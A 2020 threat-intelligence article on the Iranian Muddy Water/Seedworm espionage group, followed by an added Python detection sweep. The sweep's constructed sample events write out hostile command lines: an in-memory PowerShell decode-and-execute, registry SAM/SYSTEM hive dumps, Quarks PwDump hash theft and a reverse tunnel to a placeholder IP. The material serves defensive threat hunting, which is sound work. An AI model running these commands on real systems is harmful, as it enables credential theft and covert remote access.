22 October 2020

Muddy Water hackers target Middle East governments, telecoms

A cyber espionage group known as Muddy Water (also tracked as Seedworm), thought to be working on behalf of the Iranian government, is continuing to target entities in the Middle East. In recent months, Symantec’s Threat Hunter team has observed multiple intrusion attempts against government organizations and telecommunications operators in Iraq, Kuwait, Turkey and the United Arab Emirates.

In a recent wave of attacks the group has been deploying a known Seedworm backdoor (Backdoor.Mori), and researchers said that many of the organizations attacked by Muddy Water have also been targeted by the relatively new PowGoop malware, suggesting that the group has added the tool to its arsenal. However, Symantec says that at present it “can only establish a medium-confidence link between PowGoop and Seedworm.”

“In the majority of recent infections, PowGoop appears to have been deployed via a remote execution tool known as Remadmin. This tool is used to execute PowerShell to read and decode the contents of a file which is used to execute the contents in memory,” Symantec said.

During PowGoop activity, the researchers also observed the attackers downloading tools and unidentified content from GitHub repositories.

Symantec says it detected attacks involving PowGoop against organizations in government, technology, telecoms, oil and gas, real estate, and education sectors in Iraq, Afghanistan, Israel, Turkey, Azerbaijan, Georgia, Cambodia, and Vietnam.

In the recent attacks the researchers observed the hackers stealing credentials by dumping credential-bearing portions of the Windows Registry to files in the same directories as the Seedworm backdoors, and by using Quarks password dumper (Quarks PwDump) to steal local account password hashes. The attackers also established tunnels to their own infrastructure with the help of the open-source tools Secure Socket Funneling (SSF) and Chisel, which allowed them to configure local and remote port forwarding as well as to copy files to compromised machines.
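The tradecraft described above (PowerShell reading and decoding a file and executing the result in memory, registry dumps to disk, Quarks PwDump, and SSF/Chisel port forwarding) all leaves process-creation telemetry. The sweep below is an added example of how a hunter might encode those techniques as rules over such events; it is not code from Symantec or from the article. The sample events are constructed for illustration, and the exact command lines, paths and flags used by the actor are assumptions, since the article reports only the techniques, not samples.

```python
"""Sweep process-creation events for the Seedworm/PowGoop tradecraft above.

Added example; not code from Symantec or the article. The events below are
constructed (NOT real telemetry) and the command lines are assumptions: each
rule encodes the technique the article describes, not a specific sample.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    host: str
    image: str    # process image path
    cmdline: str  # full command line


# Each rule is a list of regex alternatives that must ALL match somewhere in
# "<image> <cmdline>" (an AND of ORs), so argument order does not matter.
RULES = {
    # PowGoop delivery: PowerShell reads a file, decodes it, runs it in memory.
    "powershell_decode_and_exec_in_memory": [
        r"\b(powershell|pwsh)(\.exe)?\b",
        r"Get-Content|ReadAllText|ReadAllBytes",
        r"FromBase64String|-EncodedCommand\b|\s-enc?\b|-bxor\b",
        r"Invoke-Expression|\bIEX\b|\.Invoke\(",
    ],
    # Credential theft by saving registry hives to disk (SAM needs SYSTEM too).
    "registry_hive_dump": [
        r"\breg(\.exe)?\s+(save|export)\b",
        r"\b(HKLM|HKEY_LOCAL_MACHINE)\\(SAM|SYSTEM|SECURITY)\b",
    ],
    # Quarks PwDump by name or by its local-hash flag. A renamed binary with
    # other flags evades this (see the last sample event): name rules are weak.
    "quarks_pwdump": [
        r"quarks?-?pwdump|--dump-hash-local\b|\s-dhl\b",
    ],
    # SSF/Chisel-style forwarding: a client verb or -L/-R flag plus a
    # <port>:<host>:<port> spec. Keyed on arguments, not the binary name,
    # because both tools are routinely renamed.
    "port_forward_tunnel": [
        r"\b(client|ssfc?)\b|\s-[LR]\s",
        r"\b\d{1,5}:[\w.\-]+:\d{1,5}\b",
    ],
}


def rule_hits(text: str) -> list[str]:
    """Names of every rule whose alternatives all match somewhere in `text`."""
    return [
        name for name, parts in RULES.items()
        if all(re.search(p, text, re.IGNORECASE) for p in parts)
    ]


def scan(events: list[Event]) -> list[tuple[str, Event]]:
    """(rule_name, event) pairs for every event that trips a rule."""
    hits = []
    for ev in events:
        for name in rule_hits(f"{ev.image} {ev.cmdline}"):
            hits.append((name, ev))
    return hits


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample events (assumed command lines, not captured ones).
SAMPLE_EVENTS = [
    Event("srv01", PS, r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"),
    Event("srv01", PS,
          r'''powershell.exe -nop -w hidden -c "$d=[IO.File]::ReadAllText('C:\ProgramData\cfg.txt');'''
          r'''IEX([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($d)))"'''),
    Event("srv02", r"C:\Windows\System32\reg.exe", r"reg save HKLM\SAM C:\Users\Public\sam.hiv"),
    Event("srv02", r"C:\Windows\System32\reg.exe", r"reg save HKLM\SYSTEM C:\Users\Public\sys.hiv"),
    Event("srv02", r"C:\Users\Public\quarks-pwdump.exe",
          r"quarks-pwdump.exe --dump-hash-local -o C:\Users\Public\h.txt"),
    Event("srv03", r"C:\Users\Public\c.exe", r"c.exe client 203.0.113.10:8080 R:3389:127.0.0.1:3389"),
    # Renamed dumper with its tell-tale flags removed: evades the name-based rule.
    Event("srv03", r"C:\Users\Public\qpd.exe", r"qpd.exe -o C:\Users\Public\h2.txt"),
]

if __name__ == "__main__":
    for name, ev in scan(SAMPLE_EVENTS):
        print(f"[{ev.host}] {name}: {ev.cmdline}")
```

Two practitioner caveats. First, the name-based Quarks PwDump rule is the weakest of the four, which the final sample event shows: once the binary is renamed and run without its usual flags, nothing here fires, so pair it with hash or behaviour-based detection (a process opening the SAM hive or LSASS). Second, the forwarding rule deliberately fires on any `-L`/`-R` `port:host:port` spec, including `ssh`, because the technique, not the tool, is what matters; triage those hits by destination. The article's observation that registry dumps landed in the same directories as the Seedworm backdoors is itself a useful pivot: the output path of a `reg save` hit is a directory worth listing.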

“Seedworm has been one of the most active Iran-linked groups in recent months, mounting apparent intelligence-gathering operations across the Middle East. While the connection between PowGoop and Seedworm remains tentative, it may suggest some retooling on Seedworm’s part. Any organization that does find evidence of PowGoop on its networks should exercise extreme caution and perform a thorough investigation,” the researchers warned.
